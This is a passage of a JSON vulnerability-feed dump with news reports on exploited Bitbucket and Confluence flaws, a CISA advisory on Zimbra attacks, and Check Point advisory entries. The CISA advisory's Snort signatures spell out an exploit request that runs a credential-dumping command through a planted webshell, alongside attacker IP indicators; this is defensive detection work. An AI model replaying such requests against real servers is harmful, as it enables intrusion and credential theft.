"THN:F3EF5A59C1D2BE2109DA45313D74AAAD", "href": "https://thehackernews.com/2022/08/critical-vulnerability-discovered-in.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-02T06:04:33", "description": "The U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) on Friday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/30/cisa-adds-three-known-exploited-vulnerabilities-catalog>) a recently disclosed critical flaw impacting Atlassian's Bitbucket Server and Data Center to the Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog, citing evidence of active exploitation.\n\nTracked as [CVE-2022-36804](<https://thehackernews.com/2022/08/critical-vulnerability-discovered-in.html>), the issue relates to a command injection vulnerability that could allow malicious actors to gain arbitrary code execution on susceptible installations by sending a specially crafted HTTP request.\n\nSuccessful exploitation, however, requires that the attacker already has access to a public repository or possesses read permissions to a private Bitbucket repository.\n\n\"All versions of Bitbucket Server and Datacenter released after 6.10.17 including 7.0.0 and newer are affected, this means that all instances that are running any versions between 7.0.0 and 8.3.0 inclusive are affected by this vulnerability,\" Atlassian [noted](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html>) in a late August 2022 advisory.\n\nCISA did not provide further details about how the flaw is being exploited and how widespread exploitation efforts are, but GreyNoise [said](<https://viz.greynoise.io/tag/atlassian-bitbucket-server-rce-attempt?days=30>) it detected evidence of in-the-wild abuse on September 20 and 23.\n\nAs a countermeasure, all Federal Civilian Executive Branch (FCEB) agencies are required to remediate the vulnerability by October 21, 2022 to protect networks against active threats.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T06:35:00", "type": "thn", "title": "CISA Warns of Hackers Exploiting Critical Atlassian Bitbucket Server Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-10-02T05:17:23", "id": "THN:22B4D07257A8FC49E106EC6A52499B31", "href": "https://thehackernews.com/2022/10/cisa-warns-of-hackers-exploiting.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-25T03:59:16", "description": "The **8220 cryptomining group** has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021.\n\n\"8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors,\" Tom Hegel of SentinelOne [said](<https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/>) in a Monday report.\n\nThe growth is said to have been fueled 
through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis.\n\nActive since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently [seen](<https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html>) targeting i686 and x86_64 Linux systems by weaponizing a newly disclosed remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner payload.\n\n\"Victims are not targeted geographically, but simply identified by their internet accessibility,\" Hegel pointed out.\n\nBesides executing the PwnRig cryptocurrency miner, the infection script is also designed to remove cloud security tools and carry out SSH brute-forcing via a list of 450 hard-coded credentials to further propagate laterally across the network.\n\nThe newer versions of the script are also known to employ blocklists to avoid compromising specific hosts, such as honeypot servers that could flag their illicit efforts.\n\nThe PwnRig cryptominer, which is based on the open source Monero miner XMRig, has received updates of its own as well, using a fake FBI subdomain with an IP address pointing to a legitimate Brazilian federal government domain to create a rogue [pool](<https://en.wikipedia.org/wiki/Mining_pool>) request and obscure the real destination of the generated money.\n\nThe ramping up of the operations is also viewed as an [attempt](<https://thehackernews.com/2022/07/cloud-based-cryptocurrency-miners.html>) to offset falling prices of cryptocurrencies, not to mention underscore a heightened \"battle\" to take control of victim systems 
from competing cryptojacking-focused groups.\n\n\"Over the past few years 8220 Gang has slowly evolved their simple, yet effective, Linux infection scripts to expand a botnet and illicit cryptocurrency miner,\" Hegel concluded. \"The group has made changes over the recent weeks to expand the botnet to nearly 30,000 victims globally.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T11:44:00", "type": "thn", "title": "This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-25T03:41:26", "id": "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "href": "https://thehackernews.com/2022/07/this-cloud-botnet-has-hijacked-30000.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": 
"2023-06-06T18:28:22", "description": "### Summary\n\nActions for ZCS administrators to take today to mitigate malicious cyber activity:\n\n\u2022 Patch all systems and prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Deploy detection signatures and hunt for indicators of compromise (IOCs). \n\u2022 If ZCS was compromised, remediate malicious activity.\n\n_Updated November 10, 2022: This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC) with contributions by the Federal Bureau of Investigation (FBI)._\n\nCISA and the MS-ISAC are publishing this joint Cybersecurity Advisory (CSA) in response to active exploitation of multiple Common Vulnerabilities and Exposures (CVEs) against Zimbra Collaboration Suite (ZCS), an enterprise cloud-hosted collaboration software and email platform. CVEs currently being exploited against ZCS include:\n\n * CVE-2022-24682\n * CVE-2022-27924\n * CVE-2022-27925 chained with CVE-2022-37042\n * CVE-2022-30333\n\nCyber threat actors may be targeting unpatched ZCS instances in both government and private sector networks. CISA and the MS-ISAC strongly urge users and administrators to apply the guidance in the Recommendations section of this CSA to help secure their organization\u2019s systems against malicious cyber activity. CISA and the MS-ISAC encourage organizations who did not immediately update their ZCS instances upon patch release, or whose ZCS instances were exposed to the internet, to assume compromise and hunt for malicious activity using the third-party detection signatures in the Detection Methods section of this CSA. Organizations that detect potential compromise should apply the steps in the Incident Response section of this CSA.\n\n**_Updated November 10_**, **_2022_**:\n\nThis CSA has been updated with additional IOCs. 
For a downloadable copy of the IOCs, see the following Malware Analysis Reports (MARs):\n\n * [MAR-10400779-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-270a>)\n * [MAR-10400779-2](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-270b>)\n * [MAR-10401765-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-270c>)\n * [MAR-10398871-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-292a>)\n * _New, November 10, 2022:_ [MAR-10410305-1.v1 JSP Webshell](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-314a>)\n\n**_Update End_**\n\nDownload the PDF version of this report: pdf, 480 kb\n\nDownload the IOCs: .stix 12.2 kb\n\n### Technical Details\n\n#### CVE-2022-27924\n\nCVE-2022-27924 is a high-severity vulnerability enabling an unauthenticated malicious actor to inject arbitrary memcache commands into a targeted ZCS instance and cause an overwrite of arbitrary cached entries. The actor can then steal ZCS email account credentials in cleartext form without any user interaction. With valid email account credentials in an organization not enforcing multifactor authentication (MFA), a malicious actor can use spear phishing, social engineering, and business email compromise (BEC) attacks against the compromised organization. Additionally, malicious actors could use the valid account credentials to open webshells and maintain persistent access.\n\nOn March 11, 2022, researchers from SonarSource announced the discovery of this ZCS vulnerability. Zimbra issued fixes for releases 8.8.15 and 9.0 on May 10, 2022. Based on evidence of active exploitation, CISA added this vulnerability to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on August 4, 2022. 
Due to ease of exploitation, CISA and the MS-ISAC expect to see widespread exploitation of unpatched ZCS instances in government and private networks.\n\n#### CVE-2022-27925 and CVE-2022-37042\n\nCVE-2022-27925 is a high-severity vulnerability in ZCS releases 8.8.15 and 9.0 that have mboximport functionality to receive a ZIP archive and extract files from it. An authenticated user has the ability to upload arbitrary files to the system, thereby leading to directory traversal.[[1](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>)] On August 10, 2022, researchers from Volexity reported widespread exploitation\u2014against over 1,000 ZCS instances\u2014of CVE-2022-27925 in conjunction with CVE-2022-37042.[[2](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>)] CISA added both CVEs to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on August 11, 2022.\n\nCVE-2022-37042 is an authentication bypass vulnerability that affects ZCS releases 8.8.15 and 9.0. CVE-2022-37042 could allow an unauthenticated malicious actor access to a vulnerable ZCS instance. According to Zimbra, CVE-2022-37042 is found in the MailboxImportServlet function.[[3](<https://nvd.nist.gov/vuln/detail/CVE-2022-37042>)][[4](<https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/>)] Zimbra issued fixes in late July 2022.\n\n#### CVE-2022-30333\n\nCVE-2022-30333 is a high-severity directory traversal vulnerability in RARLAB UnRAR on Linux and UNIX allowing a malicious actor to write to files during an extract (unpack) operation. A malicious actor can exploit CVE-2022-30333 against a ZCS server by sending an email with a malicious RAR file. 
Upon email receipt, the ZCS server would automatically extract the RAR file to check for spam or malware.[[5](<https://www.securityweek.com/unrar-vulnerability-exploited-wild-likely-against-zimbra-servers>)] Any ZCS instance with unrar installed is vulnerable to CVE-2022-30333.\n\nResearchers from SonarSource shared details about this vulnerability in June 2022.[[6](<https://www.securityweek.com/unrar-vulnerability-exploited-wild-likely-against-zimbra-servers>)] Zimbra made configuration changes to use the 7zip program instead of unrar.[[7](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25>)] CISA added CVE-2022-30333 to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on August 9, 2022. Based on industry reporting, a malicious cyber actor is selling a cross-site scripting (XSS) exploit kit for the ZCS vulnerability CVE-2022-30333. A Metasploit module is also available that creates a RAR file that can be emailed to a ZCS server to exploit CVE-2022-30333.[[8](<https://packetstormsecurity.com/files/167989/Zimbra-UnRAR-Path-Traversal.html>)]\n\n#### CVE-2022-24682\n\nCVE-2022-24682 is a medium-severity vulnerability that impacts ZCS webmail clients running releases before 8.8.15 patch 30 (update 1), which contain a cross-site scripting (XSS) vulnerability allowing malicious actors to steal session cookie files. 
Researchers from Volexity shared this vulnerability on February 3, 2022[[9](<https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/>)], and Zimbra issued a fix on February 4, 2022.[[10](<https://blog.zimbra.com/2022/02/hotfix-available-5-feb-for-zero-day-exploit-vulnerability-in-zimbra-8-8-15/>)] CISA added this vulnerability to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on February 25, 2022.\n\n### Detection Methods\n\nNote: CISA and the MS-ISAC will update this section with additional IOCs and signatures as further information becomes available.\n\nCISA recommends that administrators, especially at organizations that did not immediately update their ZCS instances upon patch release, hunt for malicious activity using the following third-party detection signatures:\n\n * _**Updated September 27**_, _**2022**_: Hunt for IOCs including:\n\nIP Address | Note\n---|---\n62.113.255[.]70 | New September 27, 2022: Used by cyber actors during August 15-26, 2022 while attempting to exploit CVE-2022-27925 and CVE-2022-37042\n185.112.83[.]77 | New September 27, 2022: Used by cyber actors during August 15-26, 2022 while attempting to exploit CVE-2022-27925 and CVE-2022-37042\n207.148.76[.]235 | A Cobalt Strike command and control (C2) domain\n209.141.56[.]190 | New September 27, 2022\n\n * _**Updated August 23**_, _**2022**_: Deploy Snort signatures to detect malicious activity:\n\nalert tcp any any -> any any (msg:\"ZIMBRA: HTTP POST content data '.jsp' file'\"; sid:x; flow:established,to_server; content:\"POST\"; http_method; content:\"|2f|service|2f|extension|2f|backup|2f|mboximport\"; nocase; http_uri; content:\"file|3a|\"; nocase; http_client_body; content:\"|2e|jsp\"; http_client_body; fast_pattern; classtype:http-content; reference:cve,2022-30333;)\n\nalert tcp any any -> any any 
(msg:\"ZIMBRA: Client HTTP Header 'QIHU 360SE'\"; sid:x; flow:established,to_server; content:\"POST\"; http_method; content:\"|2f|service|2f|extension|2f|backup|2f|mboximport\"; nocase; http_uri; content:\"QIHU|20|360SE\"; nocase; http_header; fast_pattern; classtype:http-header; reference:cve,2022-30333;)\n\nalert tcp any any -> any any (msg:\"ZIMBRA:HTTP GET URI for Zimbra Local Config\"; sid:x; flow:established,to_server; content:\"/public/jsp/runas.jsp?pwd=zim&i=/opt/zimbra/bin/zmlocalconfig|3a|-s\"; http_uri; classtype:http-uri; reference:cve,2022-30333;) \n\n * Deploy third-party YARA rules to detect malicious activity: \n * See [Volexity\u2019s Mass Exploitation of (Un)authenticated Zimbra RCE: CVE-2022-27925](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>)\n\n### Mitigations\n\nCISA and the MS-ISAC recommend organizations upgrade to the latest ZCS releases as noted on [Zimbra Security \u2013 News & Alerts](<https://wiki.zimbra.com/wiki/Security_Center>) and [Zimbra Security Advisories](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>).\n\nSee [Volexity\u2019s Mass Exploitation of (Un)authenticated Zimbra RCE: CVE-2022-27925](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) for mitigation steps.\n\nAdditionally, CISA and the MS-ISAC recommend organizations apply the following best practices to reduce risk of compromise:\n\n * **Maintain and test** an incident response plan.\n * **Ensure your organization has a vulnerability management program** in place and that it prioritizes patch management and vulnerability scanning of [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). 
**Note:** CISA\u2019s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations: [cisa.gov/cyber-hygiene-services](<https://www.cisa.gov/cyber-hygiene-services>). \n * **Properly configure and secure** internet-facing network devices. \n * Do not expose management interfaces to the internet.\n * Disable unused or unnecessary network ports and protocols.\n * Disable/remove unused network services and devices.\n * **Adopt [zero-trust principles and architecture](<https://www.cisa.gov/blog/2021/09/07/no-trust-no-problem-maturing-towards-zero-trust-architectures>)**, including: \n * Micro-segmenting networks and functions to limit or block lateral movements.\n * Enforcing phishing-resistant multifactor authentication (MFA) for all users and virtual private network (VPN) connections.\n * Restricting access to trusted devices and users on the networks.\n\n### INCIDENT RESPONSE\n\nIf an organization\u2019s system has been compromised by active or recently active threat actors in their environment, CISA and the MS-ISAC recommend the following initial steps:\n\n 1. **Collect and review artifacts**, such as running processes/services, unusual authentications, and recent network connections.\n 2. **Quarantine or take offline potentially affected hosts**.\n 3. **Reimage compromised hosts**.\n 4. **Provision new account credentials**.\n 5. **Report the compromise** to CISA via CISA\u2019s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870). 
SLTT government entities can also report to the MS-ISAC ([SOC@cisecurity.org](<mailto:SOC@cisecurity.org>) or 866-787-4722).\n\nSee the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA and the MS-ISAC also encourage government network administrators to see CISA\u2019s [Federal Government Cybersecurity Incident and Vulnerability Response Playbooks](<https://cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf>). Although tailored to federal civilian branch agencies, these playbooks provide detailed operational procedures for planning and conducting cybersecurity incident and vulnerability response activities.\n\n### ACKNOWLEDGEMENTS\n\nCISA and the MS-ISAC would like to thank Volexity and Secureworks for their contributions to this advisory.\n\n### DISCLAIMER\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. CISA and the MS-ISAC do not provide any warranties of any kind regarding this information. CISA and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. 
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### References\n\n[[1] CVE-2022-27925 detail](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>)\n\n[[2] Mass exploitation of (un)authenticated Zimbra RCE: CVE-2022-27925](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>)\n\n[[3] CVE-2022-37042 detail](<https://nvd.nist.gov/vuln/detail/CVE-2022-37042>)\n\n[[4] Authentication bypass in MailboxImportServlet vulnerability](<https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/>)\n\n[[5] CVE-2022-30333 detail](<https://nvd.nist.gov/vuln/detail/CVE-2022-30333>)\n\n[[6] UnRAR vulnerability exploited in the wild, likely against Zimbra servers](<https://www.securityweek.com/unrar-vulnerability-exploited-wild-likely-against-zimbra-servers>)\n\n[[7] Zimbra Collaboration Kepler 9.0.0 patch 25 GA release](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25>)\n\n[[8] Zimbra UnRAR path traversal](<https://packetstormsecurity.com/files/167989/Zimbra-UnRAR-Path-Traversal.html>)\n\n[[9] Operation EmailThief: Active exploitation of zero-day XSS vulnerability in Zimbra](<https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/>)\n\n[[10] Hotfix available 5 Feb for zero-day exploit vulnerability in Zimbra 8.8.15](<https://blog.zimbra.com/2022/02/hotfix-available-5-feb-for-zero-day-exploit-vulnerability-in-zimbra-8-8-15/>)\n\n### Revisions\n\n * August 16, 2022: Initial Version\n * August 22, 2022: Added Snort Signatures\n * August 23, 2022: Updated Detection Methods Snort Signatures\n * October 19, 2022: Added new Malware Analysis Report\n * November 10, 2022: Added new Malware Analysis Report\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-27T12:00:00", "type": "ics", "title": "Threat Actors Exploiting Multiple CVEs Against Zimbra Collaboration Suite", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24682", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-3033", "CVE-2022-30333", "CVE-2022-37042", "CVE-2023-27350"], "modified": "2023-01-27T12:00:00", "id": "AA22-228A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-228a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-08-17T05:59:07", "description": "A Directory Traversal vulnerability exists in Zimbra Collaboration. 
Successful exploitation of this vulnerability could allow a remote attacker to disclose or access arbitrary files on the vulnerable server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T00:00:00", "type": "checkpoint_advisories", "title": "Zimbra Collaboration Directory Traversal (CVE-2022-27925; CVE-2022-37042)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-16T00:00:00", "id": "CPAI-2022-0515", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-27T09:59:56", "description": "A command injection vulnerability exists in Mitel MiVoice Connect. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-27T00:00:00", "type": "checkpoint_advisories", "title": "Mitel MiVoice Connect Command Injection (CVE-2022-29499)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-06-27T00:00:00", "id": "CPAI-2022-0331", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T23:29:47", "description": "A hardcoded credentials vulnerability exists in Atlassian Questions for Confluence App. 
Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-08T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Questions for Confluence App Hardcoded Credentials (CVE-2022-26138)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-10T00:00:00", "id": "CPAI-2022-0467", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-20T19:05:33", "description": "A CRLF injection vulnerability exists in Zimbra Collaboration. 
Successful exploitation of this vulnerability could allow a remote attacker to damage users' systems.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-20T00:00:00", "type": "checkpoint_advisories", "title": "Zimbra Collaboration CRLF Injection (CVE-2022-27924)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-07-20T00:00:00", "id": "CPAI-2022-0357", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-10-31T18:02:15", "description": "A command injection vulnerability exists in Atlassian Bitbucket. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-31T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Bitbucket Command Injection (CVE-2022-36804)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-10-31T00:00:00", "id": "CPAI-2022-0615", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-16T19:32:54", "description": "An arbitrary file upload vulnerability exists in VMWare vCenter Server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-27T00:00:00", "type": "checkpoint_advisories", "title": "VMWare vCenter Server Arbitrary File Upload (CVE-2021-22005)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
